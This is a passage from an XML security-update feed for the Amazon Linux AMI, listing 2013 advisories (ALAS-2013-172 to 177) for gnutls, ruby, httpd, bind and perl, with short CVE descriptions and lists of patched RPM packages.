name="openssl" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-1.0.0k-1.48.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" 
version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-debuginfo-1.0.0k-1.48.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.0k" release="1.48.amzn1" epoch="0" arch="i686"><filename>Packages/openssl-perl-1.0.0k-1.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-172</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-172: medium priority package update for gnutls</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1619:
It was discovered that GnuTLS leaked timing information when decrypting TLS/SSL protocol encrypted records when CBC-mode cipher suites were used. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a TLS/SSL server as a padding oracle.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1619" title="" id="CVE-2013-1619" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0588.html" title="" id="RHSA-2013:0588" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnutls-utils" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-utils-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-devel-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-debuginfo-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="10.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnutls-guile-2.8.5-10.9.amzn1.x86_64.rpm</filename></package><package name="gnutls-guile" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-guile-2.8.5-10.9.amzn1.i686.rpm</filename></package><package name="gnutls" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-2.8.5-10.9.amzn1.i686.rpm</filename></package><package name="gnutls-debuginfo" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-debuginfo-2.8.5-10.9.amzn1.i686.rpm</filename></package><package name="gnutls-utils" version="2.8.5" release="10.9.amzn1" epoch="0" arch="i686"><filename>Packages/gnutls-utils-2.8.5-10.9.amzn1.i686.rpm</filename></package><package name="gnutls-devel" version="2.8.5" release="10.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/gnutls-devel-2.8.5-10.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-173</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-173: medium priority package update for ruby</title><issued date="2013-03-14 22:04:00" /><updated date="2014-09-15 22:42:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1821:
It was discovered that Ruby's REXML library did not properly restrict XML entity expansion. An attacker could use this flaw to cause a denial of service by tricking a Ruby application using REXML to read text nodes from specially-crafted XML content, which will result in REXML consuming large amounts of system memory.
CVE-2012-4481:
It was found that the RHSA-2011:0910 update did not correctly fix the CVE-2011-1005 issue, a flaw in the method for translating an exception message into a string in the Exception class. A remote attacker could use this flaw to bypass safe level 4 restrictions, allowing untrusted (tainted) code to modify arbitrary, trusted (untainted) strings, which safe level 4 restrictions would otherwise prevent.
CVE-2011-1005:
It was found that the RHSA-2011:0910 update did not correctly fix the CVE-2011-1005 issue, a flaw in the method for translating an exception message into a string in the Exception class. A remote attacker could use this flaw to bypass safe level 4 restrictions, allowing untrusted (tainted) code to modify arbitrary, trusted (untainted) strings, which safe level 4 restrictions would otherwise prevent.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1005" title="" id="CVE-2011-1005" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4481" title="" id="CVE-2012-4481" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1821" title="" id="CVE-2013-1821" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0612.html" title="" id="RHSA-2013:0612" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby-ri" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-ri-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-libs" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-libs-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-static" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-static-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-irb" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-irb-1.8.7.371-2.25.amzn1.noarch.rpm</filename></package><package name="ruby" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-devel" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-devel-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-rdoc" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby-rdoc-1.8.7.371-2.25.amzn1.noarch.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby-debuginfo-1.8.7.371-2.25.amzn1.x86_64.rpm</filename></package><package name="ruby-ri" 
version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-ri-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby-devel" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-devel-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby-libs" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-libs-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby-static" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-static-1.8.7.371-2.25.amzn1.i686.rpm</filename></package><package name="ruby-debuginfo" version="1.8.7.371" release="2.25.amzn1" epoch="0" arch="i686"><filename>Packages/ruby-debuginfo-1.8.7.371-2.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-174</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-174: medium priority package update for httpd</title><issued date="2013-03-26 21:25:00" /><updated date="2014-09-15 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-4558:
Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
915884:
CVE-2012-4558 httpd: XSS flaw in mod_proxy_balancer manager interface
CVE-2012-3499:
Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
915883:
CVE-2012-3499 httpd: multiple XSS flaws due to unescaped hostnames
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3499" title="" id="CVE-2012-3499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558" title="" id="CVE-2012-4558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="httpd" version="2.2.24" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="httpd-tools" version="2.2.24" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.24" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.24" release="1.29.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.24-1.29.amzn1.noarch.rpm</filename></package><package name="mod_ssl" version="2.2.24" release="1.29.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" version="2.2.24" release="1.29.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.24-1.29.amzn1.x86_64.rpm</filename></package><package name="mod_ssl" version="2.2.24" release="1.29.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.24-1.29.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.24" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.24-1.29.amzn1.i686.rpm</filename></package><package name="httpd-devel" version="2.2.24" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.24-1.29.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.24" release="1.29.amzn1" epoch="0" 
arch="i686"><filename>Packages/httpd-tools-2.2.24-1.29.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.24" release="1.29.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.24-1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-175</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-175: medium priority package update for httpd24</title><issued date="2013-03-26 21:29:00" /><updated date="2014-09-15 22:43:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2012-4558:
Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
915884:
CVE-2012-4558 httpd: XSS flaw in mod_proxy_balancer manager interface
CVE-2012-3499:
Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
915883:
CVE-2012-3499 httpd: multiple XSS flaws due to unescaped hostnames
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3499" title="" id="CVE-2012-3499" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4558" title="" id="CVE-2012-4558" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_ssl" version="2.4.4" release="2.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.4" release="2.41.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.4" release="2.41.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.4-2.41.amzn1.noarch.rpm</filename></package><package name="httpd24-devel" version="2.4.4" release="2.41.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.4-2.41.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.4" release="2.41.amzn1" epoch="1" 
arch="i686"><filename>Packages/mod24_proxy_html-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.4" release="2.41.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-devel-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="mod24_session" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.4-2.41.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.4" release="2.41.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.4-2.41.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-176</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-176: important priority package update for bind</title><issued date="2013-04-04 11:09:00" /><updated date="2014-09-15 22:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-2266:
A denial of service flaw was found in the libdns library. A remote attacker could use this flaw to send a specially-crafted DNS query to named that, when processed, would cause named to use an excessive amount of memory, or possibly crash.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2266" title="" id="CVE-2013-2266" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0689.html" title="" id="RHSA-2013:0689" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.17.rc1.29.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" 
release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.17.rc1.29.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.17.rc1.29.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2013-177</id><title>Amazon Linux AMI 2012.09 - ALAS-2013-177: medium priority package update for perl</title><issued date="2013-04-04 11:10:00" /><updated date="2014-09-15 22:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-1667:
A denial of service flaw was found in the way Perl's rehashing code implementation, responsible for recalculation of hash keys and redistribution of hash content, handled certain input. If an attacker supplied specially-crafted input to be used as hash keys by a Perl application, it could cause excessive memory consumption.
CVE-2012-6329:
It was found that the Perl Locale::Maketext module, used to localize Perl applications, did not properly handle backslashes or fully-qualified method names. An attacker could possibly use this flaw to execute arbitrary Perl code with the privileges of a Perl application that uses untrusted Locale::Maketext templates.
CVE-2012-5526:
It was found that the Perl CGI module, used to handle Common Gateway Interface requests and responses, incorrectly sanitized the values for Set-Cookie and P3P headers. If a Perl application using the CGI module reused cookies values and accepted untrusted input from web browsers, a remote attacker could use this flaw to alter member items of the cookie or add new items.
CVE-2012-5195:
A heap overflow flaw was found in Perl. If a Perl application allowed user input to control the count argument of the string repeat operator, an attacker could cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5195" title="" id="CVE-2012-5195" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5526" title="" id="CVE-2012-5526" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6329" title="" id="CVE-2012-6329" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1667" title="" id="CVE-2013-1667" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2013:0685.html" title="" id="RHSA-2013:0685" type="redhat" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-Compress-Raw-Zlib" version="2.023" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Raw-Zlib-2.023-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Archive-Tar" version="1.58" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Archive-Tar-1.58-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-CGI" version="3.51" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CGI-3.51-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-devel" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.28" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-ExtUtils-Embed-1.28-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-CPAN" version="1.9402" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CPAN-1.9402-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Pod-Escapes-1.04-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-parent" version="0.221" 
release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-parent-0.221-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Loaded" version="0.02" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Loaded-0.02-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Pluggable" version="3.90" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Pluggable-3.90-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.18" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Module-CoreList-2.18-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Archive-Extract" version="0.38" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Archive-Extract-0.38-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Zlib" version="1.09" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-IO-Zlib-1.09-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Base" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Base-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Log-Message-Simple" version="0.04" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Log-Message-Simple-0.04-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-CPANPLUS" version="0.88" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CPANPLUS-0.88-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Test-Simple" version="0.92" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Test-Simple-0.92-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-suidperl" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-suidperl-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-debuginfo" 
version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Params-Check" version="0.26" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Params-Check-0.26-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Compress-Raw-Bzip2" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Raw-Bzip2-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Term-UI" version="0.20" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Term-UI-0.20-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.27" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-ExtUtils-CBuilder-0.27-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Time-HiRes" version="1.9721" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-Time-HiRes-1.9721-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Digest-SHA" version="5.47" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Digest-SHA-5.47-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Object-Accessor" version="0.34" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Object-Accessor-0.34-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Log-Message" version="0.02" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Log-Message-0.02-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Time-Piece" version="1.15" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.15-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Build" version="0.3500" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Build-0.3500-130.17.amzn1.x86_64.rpm</filename></package><package 
name="perl-Compress-Zlib" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Zlib-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-libs" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-version" version="0.77" release="130.17.amzn1" epoch="3" arch="x86_64"><filename>Packages/perl-version-0.77-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Load-Conditional" version="0.30" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Module-Load-Conditional-0.30-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Zlib" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Zlib-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-File-Fetch" version="0.26" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-File-Fetch-0.26-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-ParseXS" version="2.2003.0" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-ExtUtils-ParseXS-2.2003.0-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Parse-CPAN-Meta" version="1.40" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Parse-CPAN-Meta-1.40-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Package-Constants-0.02-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IPC-Cmd" version="0.56" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-IPC-Cmd-0.56-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-core" version="5.10.1" release="130.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perl-core-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Load" version="0.16" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Load-0.16-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Test-Harness" version="3.17" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Test-Harness-3.17-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-MakeMaker" version="6.55" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-ExtUtils-MakeMaker-6.55-130.17.amzn1.x86_64.rpm</filename></package><package name="perl" version="5.10.1" release="130.17.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.10.1-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Bzip2" version="2.020" release="130.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Bzip2-2.020-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.18" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Locale-Maketext-Simple-0.18-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Simple" version="3.13" release="130.17.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Pod-Simple-3.13-130.17.amzn1.x86_64.rpm</filename></package><package name="perl-suidperl" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-suidperl-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="130.17.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Pod-Escapes-1.04-130.17.amzn1.i686.rpm</filename></package><package name="perl-libs" version="5.10.1" release="130.17.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.10.1-130.17.amzn1.i686.rpm</filename></package><package name="perl-version" 